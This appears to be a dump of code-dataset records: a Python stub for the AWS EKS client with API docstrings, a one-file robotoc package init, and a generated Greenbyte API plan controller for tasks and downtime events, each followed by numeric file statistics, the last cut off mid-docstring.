updateId: **[REQUIRED]** The ID of the update to describe. :rtype: dict :returns: """ pass def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None): """ Generate a presigned url given a client, its method, and arguments :type ClientMethod: string :param ClientMethod: The client method to presign for :type Params: dict :param Params: The parameters normally passed to ``ClientMethod``. :type ExpiresIn: int :param ExpiresIn: The number of seconds the presigned url is valid for. By default it expires in an hour (3600 seconds) :type HttpMethod: string :param HttpMethod: The http method to use on the generated url. By default, the http method is whatever is used in the method\'s model. 
:returns: The presigned url """ pass def get_paginator(self, operation_name: str = None) -> Paginator: """ Create a paginator for an operation. :type operation_name: string :param operation_name: The operation name. This is the same name as the method name on the client. For example, if the method name is ``create_foo``, and you\'d normally invoke the operation as ``client.create_foo(**kwargs)``, if the ``create_foo`` operation can be paginated, you can use the call ``client.get_paginator(\"create_foo\")``. :raise OperationNotPageableError: Raised if the operation is not pageable. You can use the ``client.can_paginate`` method to check if an operation is pageable. :rtype: L{botocore.paginate.Paginator} :return: A paginator object. """ pass def get_waiter(self, waiter_name: str = None) -> Waiter: """ Returns an object that can wait for some condition. :type waiter_name: str :param waiter_name: The name of the waiter to get. See the waiters section of the service docs for a list of available waiters. :returns: The specified waiter object. :rtype: botocore.waiter.Waiter """ pass def list_clusters(self, maxResults: int = None, nextToken: str = None) -> Dict: """ Lists the Amazon EKS clusters in your AWS account in the specified Region. See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/ListClusters>`_ **Request Syntax** :: response = client.list_clusters( maxResults=123, nextToken='string' ) **Response Syntax** :: { 'clusters': [ 'string', ], 'nextToken': 'string' } **Response Structure** - *(dict) --* - **clusters** *(list) --* A list of all of the clusters for your account in the specified Region. - *(string) --* - **nextToken** *(string) --* The ``nextToken`` value to include in a future ``ListClusters`` request. When the results of a ``ListClusters`` request exceed ``maxResults`` , this value can be used to retrieve the next page of results. This value is ``null`` when there are no more results to return. :type maxResults: integer :param maxResults: The maximum number of cluster results returned by ``ListClusters`` in paginated output. When this parameter is used, ``ListClusters`` only returns ``maxResults`` results in a single page along with a ``nextToken`` response element. The remaining results of the initial request can be seen by sending another ``ListClusters`` request with the returned ``nextToken`` value. This value can be between 1 and 100. If this parameter is not used, then ``ListClusters`` returns up to 100 results and a ``nextToken`` value if applicable. :type nextToken: string :param nextToken: The ``nextToken`` value returned from a previous paginated ``ListClusters`` request where ``maxResults`` was used and the results exceeded the value of that parameter. Pagination continues from the end of the previous results that returned the ``nextToken`` value. .. note:: This token should be treated as an opaque identifier that is only used to retrieve the next items in a list and not for other programmatic purposes. :rtype: dict :returns: """ pass def list_updates(self, name: str, nextToken: str = None, maxResults: int = None) -> Dict: """ Lists the updates associated with an Amazon EKS cluster in your AWS account, in the specified Region. 
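An illustrative call (the cluster name is a placeholder; pagination works the same way as for ``list_clusters``) ::

    update_ids = client.list_updates(name='my-cluster')['updateIds']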
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/ListUpdates>`_ **Request Syntax** :: response = client.list_updates( name='string', nextToken='string', maxResults=123 ) **Response Syntax** :: { 'updateIds': [ 'string', ], 'nextToken': 'string' } **Response Structure** - *(dict) --* - **updateIds** *(list) --* A list of all the updates for the specified cluster and Region. - *(string) --* - **nextToken** *(string) --* The ``nextToken`` value to include in a future ``ListUpdates`` request. When the results of a ``ListUpdates`` request exceed ``maxResults`` , this value can be used to retrieve the next page of results. This value is ``null`` when there are no more results to return. :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster for which to list updates. :type nextToken: string :param nextToken: The ``nextToken`` value returned from a previous paginated ``ListUpdates`` request where ``maxResults`` was used and the results exceeded the value of that parameter. Pagination continues from the end of the previous results that returned the ``nextToken`` value. :type maxResults: integer :param maxResults: The maximum number of update results returned by ``ListUpdates`` in paginated output. When this parameter is used, ``ListUpdates`` only returns ``maxResults`` results in a single page along with a ``nextToken`` response element. The remaining results of the initial request can be seen by sending another ``ListUpdates`` request with the returned ``nextToken`` value. This value can be between 1 and 100. If this parameter is not used, then ``ListUpdates`` returns up to 100 results and a ``nextToken`` value if applicable. :rtype: dict :returns: """ pass def update_cluster_config(self, name: str, resourcesVpcConfig: Dict = None, logging: Dict = None, clientRequestToken: str = None) -> Dict: """ Updates an Amazon EKS cluster configuration. Your cluster continues to function during the update. The response output includes an update ID that you can use to track the status of your cluster update with the DescribeUpdate API operation. You can use this API operation to enable or disable public and private access to your cluster's Kubernetes API server endpoint. By default, public access is enabled and private access is disabled. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . You can also use this API operation to enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . Cluster updates are asynchronous, and they should finish within a few minutes. During an update, the cluster status moves to ``UPDATING`` (this status transition is eventually consistent). When the update is complete (either ``Failed`` or ``Successful`` ), the cluster status moves to ``Active`` . 
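An illustrative configuration update (all values are examples; capture the update ID to track progress with ``describe_update``) ::

    response = client.update_cluster_config(
        name='my-cluster',
        resourcesVpcConfig={
            'endpointPrivateAccess': True,
            'endpointPublicAccess': False,
        },
        logging={
            'clusterLogging': [
                {'types': ['api', 'audit'], 'enabled': True},
            ]
        },
    )
    update_id = response['update']['id']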
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/UpdateClusterConfig>`_ **Request Syntax** :: response = client.update_cluster_config( name='string', resourcesVpcConfig={ 'subnetIds': [ 'string', ], 'securityGroupIds': [ 'string', ], 'endpointPublicAccess': True|False, 'endpointPrivateAccess': True|False }, logging={ 'clusterLogging': [ { 'types': [ 'api'|'audit'|'authenticator'|'controllerManager'|'scheduler', ], 'enabled': True|False }, ] }, clientRequestToken='string' ) **Response Syntax** :: { 'update': { 'id': 'string', 'status': 'InProgress'|'Failed'|'Cancelled'|'Successful', 'type': 'VersionUpdate'|'EndpointAccessUpdate'|'LoggingUpdate', 'params': [ { 'type': 'Version'|'PlatformVersion'|'EndpointPrivateAccess'|'EndpointPublicAccess'|'ClusterLogging', 'value': 'string' }, ], 'createdAt': datetime(2015, 1, 1), 'errors': [ { 'errorCode': 'SubnetNotFound'|'SecurityGroupNotFound'|'EniLimitReached'|'IpNotAvailable'|'AccessDenied'|'OperationNotPermitted'|'VpcIdNotFound'|'Unknown', 'errorMessage': 'string', 'resourceIds': [ 'string', ] }, ] } } **Response Structure** - *(dict) --* - **update** *(dict) --* An object representing an asynchronous update. - **id** *(string) --* A UUID that is used to track the update. - **status** *(string) --* The current status of the update. - **type** *(string) --* The type of the update. - **params** *(list) --* A key-value map that contains the parameters associated with the update. - *(dict) --* An object representing the details of an update request. - **type** *(string) --* The keys associated with an update request. - **value** *(string) --* The value of the keys submitted as part of an update request. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the update was created. - **errors** *(list) --* Any errors associated with a ``Failed`` update. - *(dict) --* An object representing an error when an asynchronous operation fails. - **errorCode** *(string) --* A brief description of the error. * **SubnetNotFound** : One of the subnets associated with the cluster could not be found. * **SecurityGroupNotFound** : One of the security groups associated with the cluster could not be found. * **EniLimitReached** : You have reached the elastic network interface limit for your account. * **IpNotAvailable** : A subnet associated with the cluster does not have any free IP addresses. * **AccessDenied** : You do not have permissions to perform the specified operation. * **OperationNotPermitted** : The service role associated with the cluster does not have the required access permissions for Amazon EKS. * **VpcIdNotFound** : The VPC associated with the cluster could not be found. - **errorMessage** *(string) --* A more complete description of the error. - **resourceIds** *(list) --* An optional field that contains the resource IDs associated with the error. - *(string) --* :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster to update. :type resourcesVpcConfig: dict :param resourcesVpcConfig: An object representing the VPC configuration to use for an Amazon EKS cluster. - **subnetIds** *(list) --* Specify subnets for your Amazon EKS worker nodes. Amazon EKS creates cross-account elastic network interfaces in these subnets to allow communication between your worker nodes and the Kubernetes control plane. 
- *(string) --* - **securityGroupIds** *(list) --* Specify one or more security groups for the cross-account elastic network interfaces that Amazon EKS creates to use to allow communication between your worker nodes and the Kubernetes control plane. If you do not specify a security group, the default security group for your VPC is used. - *(string) --* - **endpointPublicAccess** *(boolean) --* Set this value to ``false`` to disable public access for your cluster\'s Kubernetes API server endpoint. If you disable public access, your cluster\'s Kubernetes API server can only receive requests from within the cluster VPC. The default value for this parameter is ``true`` , which enables public access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . - **endpointPrivateAccess** *(boolean) --* Set this value to ``true`` to enable private access for your cluster\'s Kubernetes API server endpoint. If you enable private access, Kubernetes API requests from within your cluster\'s VPC will use the private VPC endpoint. The default value for this parameter is ``false`` , which disables private access for your Kubernetes API server. For more information, see `Amazon EKS Cluster Endpoint Access Control <https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html>`__ in the * *Amazon EKS User Guide* * . :type logging: dict :param logging: Enable or disable exporting the Kubernetes control plane logs for your cluster to CloudWatch Logs. By default, cluster control plane logs are not exported to CloudWatch Logs. For more information, see `Amazon EKS Cluster Control Plane Logs <https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html>`__ in the * *Amazon EKS User Guide* * . .. note:: CloudWatch Logs ingestion, archive storage, and data scanning rates apply to exported control plane logs. For more information, see `Amazon CloudWatch Pricing <http://aws.amazon.com/cloudwatch/pricing/>`__ . - **clusterLogging** *(list) --* The cluster control plane logging configuration for your cluster. - *(dict) --* An object representing the enabled or disabled Kubernetes control plane logs for your cluster. - **types** *(list) --* The available cluster control plane log types. - *(string) --* - **enabled** *(boolean) --* If a log type is enabled, then that log type exports its control plane logs to CloudWatch Logs. If a log type is not enabled, then that log type does not export its control plane logs. Each individual log type can be enabled or disabled independently. :type clientRequestToken: string :param clientRequestToken: Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. This field is autopopulated if not provided. :rtype: dict :returns: """ pass def update_cluster_version(self, name: str, version: str, clientRequestToken: str = None) -> Dict: """ Updates an Amazon EKS cluster to the specified Kubernetes version. Your cluster continues to function during the update. The response output includes an update ID that you can use to track the status of your cluster update with the DescribeUpdate API operation. Cluster updates are asynchronous, and they should finish within a few minutes. During an update, the cluster status moves to ``UPDATING`` (this status transition is eventually consistent). 
When the update is complete (either ``Failed`` or ``Successful`` ), the cluster status moves to ``Active`` . See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/eks-2017-11-01/UpdateClusterVersion>`_ **Request Syntax** :: response = client.update_cluster_version( name='string', version='string', clientRequestToken='string' ) **Response Syntax** :: { 'update': { 'id': 'string', 'status': 'InProgress'|'Failed'|'Cancelled'|'Successful', 'type': 'VersionUpdate'|'EndpointAccessUpdate'|'LoggingUpdate', 'params': [ { 'type': 'Version'|'PlatformVersion'|'EndpointPrivateAccess'|'EndpointPublicAccess'|'ClusterLogging', 'value': 'string' }, ], 'createdAt': datetime(2015, 1, 1), 'errors': [ { 'errorCode': 'SubnetNotFound'|'SecurityGroupNotFound'|'EniLimitReached'|'IpNotAvailable'|'AccessDenied'|'OperationNotPermitted'|'VpcIdNotFound'|'Unknown', 'errorMessage': 'string', 'resourceIds': [ 'string', ] }, ] } } **Response Structure** - *(dict) --* - **update** *(dict) --* The full description of the specified update - **id** *(string) --* A UUID that is used to track the update. - **status** *(string) --* The current status of the update. - **type** *(string) --* The type of the update. - **params** *(list) --* A key-value map that contains the parameters associated with the update. - *(dict) --* An object representing the details of an update request. - **type** *(string) --* The keys associated with an update request. - **value** *(string) --* The value of the keys submitted as part of an update request. - **createdAt** *(datetime) --* The Unix epoch timestamp in seconds for when the update was created. - **errors** *(list) --* Any errors associated with a ``Failed`` update. - *(dict) --* An object representing an error when an asynchronous operation fails. - **errorCode** *(string) --* A brief description of the error. * **SubnetNotFound** : One of the subnets associated with the cluster could not be found. * **SecurityGroupNotFound** : One of the security groups associated with the cluster could not be found. * **EniLimitReached** : You have reached the elastic network interface limit for your account. * **IpNotAvailable** : A subnet associated with the cluster does not have any free IP addresses. * **AccessDenied** : You do not have permissions to perform the specified operation. * **OperationNotPermitted** : The service role associated with the cluster does not have the required access permissions for Amazon EKS. * **VpcIdNotFound** : The VPC associated with the cluster could not be found. - **errorMessage** *(string) --* A more complete description of the error. - **resourceIds** *(list) --* An optional field that contains the resource IDs associated with the error. - *(string) --* :type name: string :param name: **[REQUIRED]** The name of the Amazon EKS cluster to update. :type version: string :param version: **[REQUIRED]** The desired Kubernetes version following a successful update. :type clientRequestToken: string :param clientRequestToken: Unique, case-sensitive identifier that you provide to ensure the idempotency of the request. This field is autopopulated if not provided. :rtype: dict :returns: """ pass
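# Illustrative usage sketch (not part of the generated stub): page through all
# clusters with the documented nextToken protocol. `client` is assumed to be an
# EKS client created elsewhere, e.g. boto3.client('eks').
clusters = []
token = None
while True:
    kwargs = {'maxResults': 100}
    if token:
        kwargs['nextToken'] = token
    page = client.list_clusters(**kwargs)
    clusters.extend(page['clusters'])
    token = page.get('nextToken')
    if not token:
        break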
63.775882
600
0.574645
5,840
56,059
5.495719
0.083562
0.022994
0.014956
0.019068
0.848668
0.831251
0.820284
0.814083
0.796479
0.789874
0
0.003627
0.335985
56,059
878
601
63.848519
0.858586
0.852976
0
0.387097
0
0
0
0
0
0
0
0
0
1
0.387097
false
0.387097
0.193548
0
0.612903
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
10
abcba8037385e07a2e1020d85b037b0678cdeccf
160
py
Python
bindings/python/robotoc/riccati/__init__.py
mcx/robotoc
4a1d2f522ecc8f9aa8dea17330b97148a2085270
[ "BSD-3-Clause" ]
58
2021-11-11T09:47:02.000Z
2022-03-27T20:13:08.000Z
bindings/python/robotoc/riccati/__init__.py
mcx/robotoc
4a1d2f522ecc8f9aa8dea17330b97148a2085270
[ "BSD-3-Clause" ]
30
2021-10-30T10:31:38.000Z
2022-03-28T14:12:08.000Z
bindings/python/robotoc/riccati/__init__.py
mcx/robotoc
4a1d2f522ecc8f9aa8dea17330b97148a2085270
[ "BSD-3-Clause" ]
12
2021-11-17T10:59:20.000Z
2022-03-18T07:34:02.000Z
from .lqr_policy import *
from .split_riccati_factorization import *
from .split_constrained_riccati_factorization import *
from .riccati_factorization import *
40
54
0.85625
19
160
6.842105
0.421053
0.230769
0.6
0.461538
0
0
0
0
0
0
0
0
0.09375
160
4
55
40
0.896552
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
abd5bf81e6f0a296bf70040d75857be75c385c71
45,897
py
Python
greenbyteapi/controllers/plan_controller.py
charlie9578/greenbyte-api-sdk
6835ee1f6a667b5c7827c5248391081f06b75513
[ "MIT" ]
null
null
null
greenbyteapi/controllers/plan_controller.py
charlie9578/greenbyte-api-sdk
6835ee1f6a667b5c7827c5248391081f06b75513
[ "MIT" ]
null
null
null
greenbyteapi/controllers/plan_controller.py
charlie9578/greenbyte-api-sdk
6835ee1f6a667b5c7827c5248391081f06b75513
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ greenbyteapi This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ). """ from greenbyteapi.api_helper import APIHelper from greenbyteapi.configuration import Configuration from greenbyteapi.controllers.base_controller import BaseController from greenbyteapi.http.auth.custom_header_auth import CustomHeaderAuth from greenbyteapi.models.task import Task from greenbyteapi.models.task_category import TaskCategory from greenbyteapi.models.task_comment import TaskComment from greenbyteapi.models.tasks_files_response import TasksFilesResponse from greenbyteapi.models.downtime_event import DowntimeEvent from greenbyteapi.models.site_access import SiteAccess from greenbyteapi.models.device_access import DeviceAccess from greenbyteapi.models.organization import Organization from greenbyteapi.models.personnel import Personnel from greenbyteapi.exceptions.problem_details_exception import ProblemDetailsException from greenbyteapi.exceptions.api_exception import APIException class PlanController(BaseController): """A Controller to access Endpoints in the greenbyteapi API.""" def list_tasks(self, timestamp_start, timestamp_end, device_ids=None, site_ids=None, category_ids=None, state=None, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /tasks. **(BETA)** Gets a list of tasks. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: timestamp_start (datetime): The beginning of the time interval to get data for (inclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The start timestamp **is** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". timestamp_end (datetime): The end of the time interval to get data for (exclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The end timestamp is **not** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". device_ids (list of int, optional): What devices to get tasks for. site_ids (list of int, optional): What sites to get tasks for. category_ids (list of int, optional): What task categories to include. state (TaskStateEnum, optional): What state of tasks to get: resolved and unresolved. If not set, both resolved and unresolved tasks are included. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `Task` schema (See Response Type). By default all fields are included. 
page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of Task: Response from the API. A list of tasks matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/tasks' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'timestampStart': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_start), 'timestampEnd': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_end), 'deviceIds': device_ids, 'siteIds': site_ids, 'categoryIds': category_ids, 'state': state, 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Task.from_dictionary) def list_task_categories(self): """Does a GET request to /task-categories. **(BETA)** Gets a list of task categories. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Returns: list of TaskCategory: Response from the API. A list of task categories. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
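Example:
    # Illustrative sketch; `plan` is assumed to be a PlanController
    # instance obtained from the configured SDK client.
    categories = plan.list_task_categories()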
""" # Prepare query URL _url_path = '/task-categories' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, TaskCategory.from_dictionary) def list_task_comments(self, task_id, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /tasks/{taskId}/comments. **(BETA)** Gets a list of comments belonging to a task. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: task_id (int): The id of the task. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `TaskComment` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of TaskComment: Response from the API. A list of comments belonging to the task. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" # Prepare query URL _url_path = '/tasks/{taskId}/comments' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'taskId': task_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, TaskComment.from_dictionary) def list_task_files(self, task_id, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /tasks/{taskId}/files. **(BETA)** Gets a list of files belonging to a task. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: task_id (int): The id of the task. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `TaskFile` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of TasksFilesResponse: Response from the API. A list with information about files belonging to the task. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. 
""" # Prepare query URL _url_path = '/tasks/{taskId}/files' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'taskId': task_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 404: raise APIException('The requested resource could not be found.', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, TasksFilesResponse.from_dictionary) def download_task_file(self, task_id, file_id): """Does a GET request to /tasks/{taskId}/files/{fileId}/content. **(BETA)** Downloads a file belonging to a task. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: task_id (int): The id of the task. file_id (int): The id of the file. Returns: binary: Response from the API. The contents of a file linked to the task. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/tasks/{taskId}/files/{fileId}/content' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'taskId': task_id, 'fileId': file_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare and execute request _request = self.http_client.get(_query_url) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request, binary = True) # Endpoint and global error handling using HTTP status codes. 
if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 404: raise APIException('The requested resource could not be found.', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return _context.response.raw_body def list_downtime_events(self, timestamp_start, timestamp_end, device_ids=None, site_ids=None, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /downtime-events. **(BETA)** Gets a list of downtime events. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: timestamp_start (datetime): The beginning of the time interval to get data for (inclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The start timestamp **is** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". timestamp_end (datetime): The end of the time interval to get data for 